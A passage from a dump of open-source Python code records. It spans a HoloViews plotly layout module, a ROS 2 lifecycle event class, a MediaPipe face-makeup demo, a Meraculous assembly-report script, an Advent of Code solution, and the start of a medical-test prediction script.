{1:'Single', 2:'Dual', 3: 'Triple'}\n layout_type = layout_lens.get(len(view), 'Single')\n\n # Get the AdjoinLayout at the specified coordinate\n positions = AdjointLayoutPlot.layout_dict[layout_type]['positions']\n\n # Create temporary subplots to get projections types\n # to create the correct subaxes for all plots in the layout\n layout_key, _ = layout_items.get((r, c), (None, None))\n if isinstance(layout, NdLayout) and layout_key:\n layout_dimensions = dict(zip(layout_dimensions, layout_key))\n\n # Generate the axes and create the subplots with the appropriate\n # axis objects, handling any Empty objects.\n obj = layouts[(r, c)]\n empty = isinstance(obj.main, Empty)\n if empty:\n obj = AdjointLayout([])\n else:\n layout_count += 1\n subplot_data = self._create_subplots(obj, positions,\n layout_dimensions, frame_ranges,\n num=0 if empty else layout_count)\n subplots, adjoint_layout = subplot_data\n\n # Generate the AdjointLayoutsPlot which will coordinate\n # plotting of AdjointLayouts in the larger grid\n plotopts = self.lookup_options(view, 'plot').options\n layout_plot = AdjointLayoutPlot(adjoint_layout, layout_type, subplots, **plotopts)\n layout_subplots[(r, c)] = layout_plot\n if layout_key:\n collapsed_layout[layout_key] = adjoint_layout\n return collapsed_layout, layout_subplots, paths\n\n\n def _create_subplots(self, layout, positions, layout_dimensions, ranges, num=0):\n \"\"\"\n Plot all the views contained in the AdjointLayout Object using axes\n appropriate to the layout configuration. All the axes are\n supplied by LayoutPlot - the purpose of the call is to\n invoke subplots with correct options and styles and hide any\n empty axes as necessary.\n \"\"\"\n subplots = {}\n adjoint_clone = layout.clone(shared_data=False, id=layout.id)\n subplot_opts = dict(adjoined=layout)\n main_plot = None\n for pos in positions:\n # Pos will be one of 'main', 'top' or 'right' or None\n element = layout.get(pos, None)\n if element is None:\n continue\n\n # Options common for any subplot\n vtype = element.type if isinstance(element, HoloMap) else element.__class__\n plot_type = Store.registry[self.renderer.backend].get(vtype, None)\n plotopts = self.lookup_options(element, 'plot').options\n side_opts = {}\n if pos != 'main':\n plot_type = AdjointLayoutPlot.registry.get(vtype, plot_type)\n if pos == 'right':\n side_opts = dict(height=main_plot.height, yaxis='right',\n invert_axes=True, width=120, labelled=['y'],\n xticks=2, show_title=False)\n else:\n side_opts = dict(width=main_plot.width, xaxis='top',\n height=120, labelled=['x'], yticks=2,\n show_title=False)\n\n # Override the plotopts as required\n # Customize plotopts depending on position.\n plotopts = dict(side_opts, **plotopts)\n plotopts.update(subplot_opts)\n\n if plot_type is None:\n self.param.warning(\n \"Plotly plotting class for %s type not found, \"\n \"object will not be rendered.\" % vtype.__name__)\n continue\n num = num if len(self.coords) > 1 else 0\n subplot = plot_type(element, keys=self.keys,\n dimensions=self.dimensions,\n layout_dimensions=layout_dimensions,\n ranges=ranges, subplot=True,\n uniform=self.uniform, layout_num=num,\n **plotopts)\n subplots[pos] = subplot\n if isinstance(plot_type, type) and issubclass(plot_type, GenericCompositePlot):\n adjoint_clone[pos] = subplots[pos].layout\n else:\n adjoint_clone[pos] = subplots[pos].hmap\n if pos == 'main':\n main_plot = subplot\n\n return subplots, adjoint_clone\n\n\n def generate_plot(self, key, ranges=None, is_geo=False):\n ranges = 
self.compute_ranges(self.layout, self.keys[-1], None)\n plots = [[] for i in range(self.rows)]\n insert_rows = []\n for r, c in self.coords:\n subplot = self.subplots.get((r, c), None)\n if subplot is not None:\n subplots = subplot.generate_plot(key, ranges=ranges, is_geo=is_geo)\n\n # Computes plotting offsets depending on\n # number of adjoined plots\n offset = sum(r >= ir for ir in insert_rows)\n if len(subplots) > 2:\n subplot = figure_grid([[subplots[0], subplots[1]],\n [subplots[2], None]],\n column_spacing=self.adjoint_spacing,\n row_spacing=self.adjoint_spacing)\n elif len(subplots) > 1:\n subplot = figure_grid([subplots],\n column_spacing=self.adjoint_spacing,\n row_spacing=self.adjoint_spacing)\n else:\n subplot = subplots[0]\n\n plots[r + offset] += [subplot]\n\n fig = figure_grid(\n list(reversed(plots)),\n column_spacing=self.hspacing,\n row_spacing=self.vspacing\n )\n\n # Configure axis matching\n if self.shared_axes:\n configure_matching_axes_from_dims(fig)\n\n fig['layout'].update(title=self._format_title(key))\n\n self.drawn = True\n\n self.handles['fig'] = fig\n return self.handles['fig']\n\n\n\nclass AdjointLayoutPlot(PlotlyPlot, GenericAdjointLayoutPlot):\n\n registry = {}\n\n def __init__(self, layout, layout_type, subplots, **params):\n # The AdjointLayout ViewableElement object\n self.layout = layout\n # Type may be set to 'Embedded Dual' by a call it grid_situate\n self.layout_type = layout_type\n self.view_positions = self.layout_dict[self.layout_type]['positions']\n\n # The supplied (axes, view) objects as indexed by position\n super().__init__(subplots=subplots, **params)\n\n def initialize_plot(self, ranges=None, is_geo=False):\n \"\"\"\n Plot all the views contained in the AdjointLayout Object using axes\n appropriate to the layout configuration. 
All the axes are\n supplied by LayoutPlot - the purpose of the call is to\n invoke subplots with correct options and styles and hide any\n empty axes as necessary.\n \"\"\"\n return self.generate_plot(self.keys[-1], ranges, is_geo=is_geo)\n\n def generate_plot(self, key, ranges=None, is_geo=False):\n adjoined_plots = []\n for pos in ['main', 'right', 'top']:\n # Pos will be one of 'main', 'top' or 'right' or None\n subplot = self.subplots.get(pos, None)\n # If no view object or empty position, disable the axis\n if subplot:\n adjoined_plots.append(\n subplot.generate_plot(key, ranges=ranges, is_geo=is_geo)\n )\n if not adjoined_plots: adjoined_plots = [None]\n return adjoined_plots\n\n\n\nclass GridPlot(PlotlyPlot, GenericCompositePlot):\n \"\"\"\n Plot a group of elements in a grid layout based on a GridSpace element\n object.\n \"\"\"\n\n hspacing = param.Number(default=15, bounds=(0, None))\n\n vspacing = param.Number(default=15, bounds=(0, None))\n\n shared_axes = param.Boolean(default=True, doc=\"\"\"\n Whether axes ranges should be shared across the layout, if\n disabled switches axiswise normalization option on globally.\"\"\")\n\n def __init__(self, layout, ranges=None, layout_num=1, **params):\n if not isinstance(layout, GridSpace):\n raise Exception(\"GridPlot only accepts GridSpace.\")\n super().__init__(layout=layout, layout_num=layout_num,\n ranges=ranges, **params)\n self.cols, self.rows = layout.shape\n self.subplots, self.layout = self._create_subplots(layout, ranges)\n\n if self.top_level:\n self.traverse(lambda x: attach_streams(self, x.hmap, 2),\n [GenericElementPlot])\n\n\n def _create_subplots(self, layout, ranges):\n subplots = {}\n frame_ranges = self.compute_ranges(layout, None, ranges)\n frame_ranges = dict([(key, self.compute_ranges(layout, key, frame_ranges))\n for key in self.keys])\n collapsed_layout = layout.clone(shared_data=False, id=layout.id)\n for coord in layout.keys(full_grid=True):\n if not isinstance(coord, tuple): coord = (coord,)\n view = layout.data.get(coord, None)\n # Create subplot\n if view is not None:\n vtype = view.type if isinstance(view, HoloMap) else view.__class__\n opts = self.lookup_options(view, 'plot').options\n else:\n vtype = None\n\n # Create axes\n kwargs = {}\n if isinstance(layout, GridMatrix):\n if view.traverse(lambda x: x, [Histogram]):\n kwargs['shared_axes'] = False\n\n # Create subplot\n plotting_class = Store.registry[self.renderer.backend].get(vtype, None)\n if plotting_class is None:\n if view is not None:\n self.param.warning(\n \"Plotly plotting class for %s type not found, \"\n \"object will not be rendered.\" % vtype.__name__)\n else:\n subplot = plotting_class(view, dimensions=self.dimensions,\n show_title=False, subplot=True,\n ranges=frame_ranges, uniform=self.uniform,\n keys=self.keys, **dict(opts, **kwargs))\n collapsed_layout[coord] = (subplot.layout\n if isinstance(subplot, GenericCompositePlot)\n else subplot.hmap)\n subplots[coord] = subplot\n return subplots, collapsed_layout\n\n\n def generate_plot(self, key, ranges=None, is_geo=False):\n ranges = self.compute_ranges(self.layout, self.keys[-1], None)\n plots = [[] for r in range(self.cols)]\n for i, coord in enumerate(self.layout.keys(full_grid=True)):\n r = i % self.cols\n subplot = self.subplots.get(wrap_tuple(coord), None)\n if subplot is not None:\n plot = subplot.initialize_plot(ranges=ranges, is_geo=is_geo)\n plots[r].append(plot)\n else:\n plots[r].append(None)\n\n # Compute final width/height\n w, h = self._get_size(subplot.width, 
subplot.height)\n\n fig = figure_grid(plots,\n column_spacing=self.hspacing,\n row_spacing=self.vspacing,\n share_xaxis=True,\n share_yaxis=True,\n width=w,\n height=h\n )\n\n fig['layout'].update(title=self._format_title(key))\n\n self.drawn = True\n\n self.handles['fig'] = fig\n return self.handles['fig']\n\n\n def _get_size(self, width, height):\n max_dim = max(self.layout.shape)\n # Reduce plot size as GridSpace gets larger\n shape_factor = 1. / max_dim\n # Expand small grids to a sensible viewing size\n expand_factor = 1 + (max_dim - 1) * 0.1\n scale_factor = expand_factor * shape_factor\n cols, rows = self.layout.shape\n return (scale_factor * cols * width,\n scale_factor * rows * height)\n","repo_name":"holoviz/holoviews","sub_path":"holoviews/plotting/plotly/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":15750,"program_lang":"python","lang":"en","doc_type":"code","stars":2514,"dataset":"github-code","pt":"20"} +{"seq_id":"29117052748","text":"from typing import Text\n\nfrom launch.event import Event\n\nimport lifecycle_msgs.msg\n\nif False:\n # imports here would cause loops, but are only used as forward-references for type-checking\n from ...actions import LifecycleNode # noqa: F401\n\n\nclass StateTransition(Event):\n \"\"\"Event emitted when a lifecycle node makes a state transition.\"\"\"\n\n name = 'launch_ros.events.lifecycle.StateTransition'\n\n def __init__(\n self,\n *,\n action: 'LifecycleNode',\n msg: lifecycle_msgs.msg.TransitionEvent\n ) -> None:\n \"\"\"\n Create a StateTransition event.\n\n :param: action the instance of class::`LifecycleNode` that generated this event\n :param: msg the instance of the ROS message TransitionEvent that generated this event\n \"\"\"\n super().__init__()\n self.__action = action\n self.__msg = msg\n self.__timestamp = msg.timestamp\n self.__transition = msg.transition.label\n self.__start_state = msg.start_state.label\n self.__goal_state = msg.goal_state.label\n\n @property\n def action(self) -> 'LifecycleNode':\n \"\"\"Getter for action.\"\"\"\n return self.__action\n\n @property\n def msg(self) -> lifecycle_msgs.msg.TransitionEvent:\n \"\"\"Getter for msg.\"\"\"\n return self.__msg\n\n @property\n def timestamp(self) -> int:\n \"\"\"Getter for timestamp.\"\"\"\n return self.__timestamp\n\n @property\n def transition(self) -> Text:\n \"\"\"Getter for transition.\"\"\"\n return self.__transition\n\n @property\n def start_state(self) -> Text:\n \"\"\"Getter for start_state.\"\"\"\n return self.__start_state\n\n @property\n def goal_state(self) -> Text:\n \"\"\"Getter for goal_state.\"\"\"\n return self.__goal_state\n","repo_name":"ros2/launch_ros","sub_path":"launch_ros/launch_ros/events/lifecycle/state_transition.py","file_name":"state_transition.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"20"} +{"seq_id":"636158485","text":"import numpy as np\nimport cv2\nimport queue\nimport threading\n\nimport mediapipe as mp\nfrom mediapipe.tasks import python\nfrom mediapipe.tasks.python import vision\n\nfrom utils import draw_landmarks_on_image, apply_makeup\n\nMODEL_PATH = \"model/face_landmarker.task\"\n\nBaseOptions = mp.tasks.BaseOptions\nFaceLandmarker = vision.FaceLandmarker\nFaceLandmarkerOptions = vision.FaceLandmarkerOptions\nFaceLandmarkerResult = vision.FaceLandmarkerResult\nVisionRunningMode = vision.RunningMode\n\ndef main():\n\n \n def pass_result(result: FaceLandmarkerResult, output_image: mp.Image, timestamp_ms: 
int):\n if result:\n queue.put(result)\n\n options = FaceLandmarkerOptions(\n base_options = BaseOptions(model_asset_path = MODEL_PATH),\n running_mode = VisionRunningMode.LIVE_STREAM,\n result_callback = pass_result\n )\n\n\n with FaceLandmarker.create_from_options(options) as landmarker:\n\n stream = cv2.VideoCapture(0)\n i = 0\n while True:\n ret, frame = stream.read()\n if ret:\n frame_timestamp = stream.get(cv2.CAP_PROP_POS_MSEC)\n\n rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n mp_image = mp.Image(\n image_format = mp.ImageFormat.SRGB,\n data = rgb_frame\n )\n i += 1\n landmarker.detect_async(mp_image, i)#int(frame_timestamp))\n\n face_landmarks_result = queue.get()\n\n #print(face_landmarks_result)\n #annotated_image = draw_landmarks_on_image(mp_image.numpy_view(),face_landmarks_result)\n annotated_image = apply_makeup(mp_image.numpy_view(),face_landmarks_result)\n cv2.imshow('video', cv2.cvtColor(annotated_image, cv2.COLOR_RGB2BGR))\n \n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n stream.release()\n cv2.destroyAllWindows()\n\n\n\n\nif __name__ == '__main__':\n queue = queue.Queue() \n\n # Create a thread for running the FaceLandmarker\n face_landmarker_thread = threading.Thread(target=main)\n\n face_landmarker_thread.start()\n ","repo_name":"DavidJimenez10/RT-Makeup-Mediapipe","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"32447318502","text":"import sys\nimport argparse\nimport os\nimport re\nimport subprocess\nimport shutil\n\n#https://py-gfm.readthedocs.io/en/latest/\nimport markdown\nfrom mdx_gfm import GithubFlavoredMarkdownExtension\n\n#multiprocessing stuff\nfrom functools import partial\nfrom multiprocessing import cpu_count\nfrom multiprocessing import Pool\nfrom multiprocessing.dummy import Pool as ThreadPool\n\nclass FullPaths(argparse.Action):\n \"\"\"Expand user- and relative-paths\"\"\"\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest,\n os.path.abspath(os.path.expanduser(values)))\n\ndef parse_arguments():\n parser=argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"-c\", \"--censor\",\n type=str,\n nargs='+',\n help=\"\"\"list of strings to censor for sending docs to\n non-collaborators\"\"\")\n parser.add_argument(\"-q\", \"--quiet\",\n action='store_true')\n\n options = parser.parse_args()\n return options\n\nclass merRunAnalyzer:\n def __init__(self, directory, censor, quiet=False):\n \"\"\"In a future edit, change this method to auto-detect whether the\n run is diploid mode 1, 2, or 3\n \"\"\"\n self.home = os.path.abspath(directory.strip())\n self.homeBasename = os.path.basename(directory.strip())\n self.parent = os.path.dirname(self.home.strip())\n\n #setup the bit to cleanly censor the files\n self.home.strip().rsplit(\"/\")\n censor = [x for x in self.parent.strip().rsplit(\"/\") if x]\n self.censor = {strip: \"\" for strip in censor}\n self.rep = dict((re.escape(k), v) for k, v in self.censor.items())\n self.pattern = re.compile(\"|\".join(self.rep.keys()))\n\n #filename prefix, sanitized with censor method\n self.outname=self.str_ripper(os.path.basename(self.home))\n self.merReportsDir = os.path.join(self.parent, \"meraculous_reports\")\n self.reportDir = os.path.join(self.merReportsDir, self.outname)\n\n self.isMer = self.is_meraculous()\n self.quiet = quiet\n\n self.mer_size = None\n self.diploid_mode = None\n 
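# placeholders: get_Params() below fills these in from log/meraculous.log when the directory is a real meraculous run\n        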
self.genome_size = None\n self.min_depth_cutoff = None\n if self.isMer:\n self.get_Params()\n\n def is_meraculous(self):\n os.chdir(self.home)\n subdirs = [dirs.strip() for dirs in os.listdir(self.home) if os.path.isdir(dirs.strip())]\n print(subdirs)\n os.chdir(self.parent)\n return (\"log\" in subdirs) and (\"meraculous_import\" in subdirs)\n\n def call_sys(self, callString, logfile):\n print(\"\\ncalling command:\", file=logfile)\n print(self.str_ripper(callString), file=logfile)\n p = subprocess.run(callString, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n universal_newlines=True)\n output = self.str_ripper(str(p.stdout))\n err = self.str_ripper(str(p.stderr))\n print(output, file=logfile)\n print(err, file=logfile)\n if not self.quiet:\n print(output)\n print(err)\n return (output, err)\n\n def make_HTML(self, logfile):\n html_filepath = os.path.join(\n self.merReportsDir,\n \"{0}_report.html\".format(self.outname))\n print(\"making html at {}\".format(html_filepath))\n callString = \"python -m markdown -x markdown.extensions.fenced_code -x pymdownx.b64 {0} > {1}\".format(\n logfile,\n html_filepath)\n p = subprocess.run(callString, shell=True)\n\n def get_Params(self):\n logFile = os.path.join(self.home, \"log/meraculous.log\")\n grep_list=[\"mer_size\", \"diploid_mode\",\n \"genome_size\", \"min_depth_cutoff\"]\n done = {x:False for x in grep_list}\n\n with open(logFile, \"r\") as f:\n for line in f:\n for query in grep_list:\n if re.search(query, line):\n value=line.strip().split()[1]\n print(\"query: {}, value: {}\".format(query, value))\n setattr(self, query, value)\n done[query] = True\n if False not in done.values():\n break\n\n def str_ripper(self, text):\n \"\"\"Got this code from here:\n http://stackoverflow.com/questions/6116978/python-replace-multiple-strings\n\n This method takes a set of strings, A, and removes all whole\n elements of set A from string B.\n\n Input: text string to strip based on instance attribute self.censor\n Output: a stripped (censored) text string\n \"\"\"\n return self.pattern.sub(lambda m: self.rep[re.escape(m.group(0))], text)\n\n def generate_report(self):\n \"\"\"This method does most of the work for this class. It generates an\n individual report for the instance.\n \"\"\"\n\n print(\"making plot for {}\".format(self.outname))\n # make the markdown file to log to while doing analyses\n logfile_filepath = os.path.join(\n self.reportDir,\n \"{0}_report.md\".format(self.outname))\n\n #check if seld.reportDir exists\n # if not, make it\n if not os.path.exists(self.reportDir):\n print(\"making the directory: {}\".format(self.reportDir))\n os.makedirs(self.reportDir)\n\n logfile = open(logfile_filepath, 'w')\n\n # make a title in the markdown file\n print(\"# {0}\".format(self.outname), file=logfile)\n print(\"## Meraculous assembly QC analysis\", file=logfile)\n\n # 0. Run params\n print(\"### 0. Run params\", file=logfile)\n print(\"\", file=logfile)\n print(\"- mer_size: `{}`\".format(self.mer_size), file=logfile)\n print(\"- diploid_mode: `{}`\".format(self.diploid_mode), file=logfile)\n print(\"- genome_size: `{}`\".format(self.genome_size), file=logfile)\n print(\"- min_depth_cutoff: `{}`\".format(self.min_depth_cutoff), file=logfile)\n print(\"\", file=logfile)\n\n # 1. get the mercount and kha plot\n print(\"### 1. 
`meraculous_mercount` output\", file = logfile)\n print(\"\", file=logfile)\n print(\"#### `mercount.png`\", file = logfile)\n print(\"\", file=logfile)\n mercountFromPath = os.path.join(self.homeBasename, \"meraculous_mercount/mercount.png\")\n mercountToPath = os.path.join(self.reportDir, \"mercount.png\")\n mercountHTML = os.path.join(\n os.path.basename(os.path.split(mercountToPath)[0]),\n os.path.basename(mercountToPath))\n shutil.copyfile(mercountFromPath, mercountToPath)\n print(\"![mercount]({0})\".format(mercountHTML),\n file=logfile)\n print(\"\", file=logfile)\n print(\"#### `kha.png`\", file = logfile)\n print(\"\", file=logfile)\n khaFromPath = os.path.join(self.homeBasename, \"meraculous_mercount/kha.png\")\n khaToPath = os.path.join(self.reportDir, \"kha.png\")\n khaHTML = os.path.join(\n os.path.basename(os.path.split(khaToPath)[0]),\n os.path.basename(khaToPath))\n shutil.copyfile(khaFromPath, khaToPath)\n print(\"![kha]({0})\".format(khaHTML),\n file=logfile)\n print(\"\", file=logfile)\n\n # 2. run fasta_stats on UUtig.fa\n # this is the result of the first contigs produced by meraculous_contigs\n print(\"### 2. `fasta_stats UUtigs.fa`\", file=logfile)\n print(\"\", file=logfile)\n print(\"\"\"This is the output of `meraculous_contigs`. In a diploid genome,\n the total length of all contigs at this stage should be\n larger than the expected genome size because of the\n presence of haplotype variant UUtigs. (Meraculous\n manual)\"\"\", file=logfile)\n print(\"\",file=logfile)\n print(\"```\", file=logfile)\n callString=\"fasta_stats {0}\".format(\n \"{}/meraculous_contigs/UUtigs.fa\".format(self.home))\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\",file=logfile)\n\n if int(self.diploid_mode) == 1:\n #2.5. Check out the output of meraculous_bubble\n print(\"### 2.5. Diploid mode plot\", file=logfile)\n print(\"\", file=logfile)\n print(\"\"\"- If there are two peaks, and the \"half-depth\" peak is much larger\n than the one at full depth, that's a scenario that's\n best handled by diploid_mode 2. If it's the\n opposite, make sure the parameter\n 'bubble_depth_threshold' is being set correctly (if\n auto-detected, the result is written into\n `meraculous_bubble/haplotigs.dmin.err`) - E. Goltsman.\"\"\",\n file=logfile)\n print(\"\"\"- For diploid assemblies, you should examine the file\n haplotigs.depth.hist.png and verify that there are\n two distinct peaks, one at roughly half depth of the\n other. At this point you may want to check your\n bubble_depth_threshold parameter and adjust it to a\n value corresponding to the local minimum between the\n two peaks (_ if you had originally set it to 0\n Meraculous auto-detects this threshold_). 
- Meraculous Manual\"\"\",\n file=logfile)\n print(\"\", file=logfile)\n bblFromPath = os.path.join(self.homeBasename,\n \"meraculous_bubble/haplotigs.depth.hist.png\")\n bblToPath = os.path.join(self.reportDir, \"haplotigs.depth.hist.png\")\n bblHTML = os.path.join(\n os.path.basename(os.path.split(bblToPath)[0]),\n os.path.basename(bblToPath))\n shutil.copyfile(bblFromPath, bblToPath)\n print(\"![bbl]({0})\".format(bblHTML),\n file=logfile)\n print(\"\", file=logfile)\n bbl_detect=os.path.join(self.home, \"meraculous_bubble/haplotigs.dmin.err\")\n if os.path.exists(bbl_detect):\n #in a later version, just look at the meraculous log file\n print(\"\", file=logfile)\n print(\"#### `bubble_depth_threshold` auto-detected\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"cat {0}\".format(bbl_detect)\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n else:\n print(\"\", file=logfile)\n print(\"#### `bubble_depth_threshold` was user-input\", file=logfile)\n print(\"\", file=logfile)\n print(\"#### `fasta_stats meraculous_bubble/haplotigs.fa\", file=logfile)\n print(\"\", file=logfile)\n print(\"\"\"- These are the assembly stats after running\n `meraculous_bubble`.\"\"\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"fasta_stats {0}\".format(\n os.path.join(self.home, \"meraculous_bubble/haplotigs.fa\"))\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n\n if int(self.diploid_mode) == 1:\n print(\"### 2.6. Note on `meraculous_ono` with `diploid_mode=1`\", file=logfile)\n print(\"\", file=logfile)\n print(\"\"\"- [ Note: If running in diploid_mode 1, the scaffolding is initially\n performed using combined linkage info from alternative\n variant diplotigs, i.e., both variants contribute read\n pairs to the same link as if they were one and the\n same contig. Then, using haplotype-specific read\n mapping info, phased variant paths are determined and\n the scaffold content is corrected in a haplotype\n consistent manner. As a result, one variant path\n (typically one with the higher overall depth) will be\n preserved in a multi-contig scaffold while the\n individual alternative variants are represented as\n unlinked, singleton scaffolds. A list of these\n singleton alternative variant scaffolds is also\n saved. For more on diploid-aware assembly, see section\n ‘Diploid assembly’. ] - _Meraculous manual_\"\"\", file=logfile)\n\n print(\"### 3. `meraculous_gap_closure`\", file=logfile)\n print(\"\", file=logfile)\n print(\"#### 3.1 `final.scaffolds.fa`\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"fasta_stats {0}\".format(\n os.path.join(self.home, \"meraculous_gap_closure/final.scaffolds.fa\"))\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n\n if int(self.diploid_mode) == 1:\n print(\"#### 3.1. Note on haplotype final scaffolds\", file=logfile)\n print(\"\", file=logfile)\n print(\"\"\"- [Note: when running in diploid_mode 1, if a gap\n represents a polymorphic region that had been actively\n removed earlier (i.e., a half-depth isotig), Meraculous\n will attempt to walk across it using reads from the more\n abundant allele]. 
- _Meraculous manual_\"\"\", file=logfile)\n print(\"\"\"- When running in diploid_mode 1, a “single-haplotype” sequence\n file (final.scaffolds.single-haplotype.fa) where the\n alternative variant scaffolds have been removed is also\n created. - _Meraculous manual_\"\"\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"fasta_stats {0}\".format(\n os.path.join(self.home, \"meraculous_gap_closure/final.scaffolds.single-haplotype.fa\"))\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n\n print(\"### 4. `meraculous_final_results`\", file=logfile)\n print(\"\"\"- The final output of meraculous\"\"\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"fasta_stats {0}\".format(\n os.path.join(self.home, \"meraculous_final_results/final.scaffolds.fa\"))\n self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n\n # this block handles the printing the meraculous log to the new output\n # directory\n print(\"### 5. `meraculous_log`\", file=logfile)\n print(\"\"\"- The final output of meraculous\"\"\", file=logfile)\n print(\"\", file=logfile)\n print(\"```\", file=logfile)\n callString=\"cat {0}\".format(\n os.path.join(self.home, \"log/meraculous.log\"))\n output, err = self.call_sys(callString, logfile)\n print(\"```\", file=logfile)\n print(\"\", file=logfile)\n new_mer_log_path = os.path.join(self.reportDir, \"meraculous.log\")\n with open (new_mer_log_path, \"w\") as f:\n print(output, file=f)\n\n logfile.close()\n self.make_HTML(logfile_filepath)\n\ndef run_merReport_dummy(instance):\n \"\"\"This function is a helper method for merReport.generate_report().\n Specifically, it just calls the generate_report()\n function for each instance of class PreqcAnalysis to get around the\n limitations of the multiprocessing module.\"\"\"\n instance.generate_report()\n\n\ndef determine_pool_size(job_vector):\n \"\"\"This function determines how large of a pool to make based on the\n system resources currently available and how many jobs there are\n to complete.\n \"\"\"\n\n available_threads = cpu_count()\n total_jobs = len(job_vector)\n threads_to_pass = total_jobs\n if total_jobs >= available_threads:\n threads_to_pass = available_threads\n if threads_to_pass > 90:\n threads_to_pass = 90\n print(\"There are {} threads available.\\nThere are {} jobs:\\nMaking a pool with {} threads\".format(\n available_threads, total_jobs, threads_to_pass), file = sys.stderr)\n return threads_to_pass\n\ndef available_threads():\n \"\"\"This is customized to always leave 6 threads on a server that has 96\n total threads, but this process takes such little time that it doesn't\n really matter.\n \"\"\"\n threads = cpu_count()\n if threads >= 90:\n return 90\n else:\n return threads\n\ndef main():\n \"\"\"1. Parse args\n 2. Figure out which directories are actually meraculous run directories\n 3. 
Make an instance for each directory and generate a report\n    \"\"\"\n    home = os.getcwd()\n    options = parse_arguments()\n    print(options)\n    print()\n\n    #get a list of all directories in the cwd\n    dirs = [direc for direc in os.listdir(home) if os.path.isdir(direc)]\n    #instantiate all of the classes that we will be using in parallel processing\n    instances = []\n    for each in dirs:\n        thisInstance = merRunAnalyzer(each, options.censor, options.quiet)\n        #only process the instances that are meraculous directories\n        if thisInstance.isMer:\n            instances.append(thisInstance)\n\n    if len(instances) == 0:\n        print(\"There are no meraculous folders in this directory. Exiting\")\n    elif len(instances) > 0:\n        # run the program for each instance\n        #process each file sequentially using max number of threads\n        #determine the pool size to work with the unique sample names\n        pool_size = determine_pool_size(instances)\n        pool = ThreadPool(pool_size)\n        results = pool.map(run_merReport_dummy, instances)\n        pool.close()\n        pool.join()\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n\n","repo_name":"conchoecia/gloTK","sub_path":"scripts/glotk-mer-reporter.py","file_name":"glotk-mer-reporter.py","file_ext":"py","file_size_in_byte":17907,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"23"} {"seq_id":"38377829608","text":"import sys\n\nimport numpy as np\n\ndef input():\n    with open(sys.argv[1]) as f:\n        for line in f:\n            yield line\n\nclass TreeField:\n    def __init__(self, array):\n        self.tree_field = np.array(array)\n\n    def has_tree(self, x, y):\n        return self.tree_field[y, x]\n\n    def height(self):\n        return self.tree_field.shape[0]\n\n    def width(self):\n        return self.tree_field.shape[1]\n\n    def traverse(self, x_stride, y_stride):\n        x_pos, y_pos = 0, 0\n        trees_encountered = 0\n        while y_pos < self.height():\n            if self.has_tree(x_pos,y_pos):\n                trees_encountered += 1\n            y_pos += y_stride\n            x_pos = (x_pos + x_stride) % self.width()\n        return trees_encountered\n\n\n    def __repr__(self):\n        return '\\n'.join([''.join(['#' if self.has_tree(x,y) else '.' for x in range(self.width())]) for y in range(self.height())])\n\ndef main():\n    tree_field = []\n    for line in input():\n        row = []\n        for c in line.strip():\n            row.append(c == '#')\n        tree_field.append(row)\n\n    tree_field = TreeField(tree_field)\n\n    slopes_to_test = [(1,1), (3,1), (5,1), (7,1), (1,2)]\n\n    product = 1\n    for x_stride, y_stride in slopes_to_test:\n        product *= tree_field.traverse(x_stride, y_stride)\n\n    print(product)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"robbystk/advent-of-code-2020","sub_path":"03-toboggan-trajectory/trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} {"seq_id":"17206208815","text":"import numpy as np\nimport pred_util as pu\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nRARENESS = 1000\nTR = 0.7\nC = 1e5\nALPHA = 0.1\n\ndata = pu.cleaned_data('data_sample.csv')\n\n# we shall now identify a relatively rare feature - which occurs around 1,000 times (1,\n# 000 patients had taken it), and then construct a feature vector for every patient that has done\n# it, considering the rare test as the label of this feature vector, and all the tests that have\n# been taken more times than the chosen one - as the features. 
if a patient hasn't done a\n# certain test, it's value in the feature vector would be 0.\n\ntimes_taken = data[\"test id\"].value_counts() # ordered from top to bottom\nmore_common = times_taken[times_taken >= RARENESS]\n\nrare_test = np.array(more_common[-1:-2:-1].index) # the id str of the chosen rare test\ntests_array = np.array(more_common[:-1:].index) # all the id's of the tests that were taken\n# more often than the 'rare test' as keys\n\nX, y = pu.features_and_labels(data, rare_test, tests_array)\n\n# It is now time for training and testing! let us begin with putting 30% of the data aside for\n# testing, and keeping 70% for training\n\nn = np.shape(X)[0]\n\nX_tr = X[0:int(TR * n)]\nX_tst = X[int(TR * n):]\n\ny_tr = y[0:int(TR * n)]\ny_tst = y[int(TR * n):]\n\n# we would like to check, whether the y values could be any number within some limits, or if they\n# could only get the value of a discrete group of test results (i.e. a rational number between\n# [1,100] or an int in the group {0, 1, 2, 3, 4}).\n\n# in order to determine - we should use the threshold value 0.5 for repetitiveness of labels,\n# which effectively means:\nnum_of_unique_labels = len(np.unique(y))\nnum_of_labels = len(y)\ndiscrete = True if 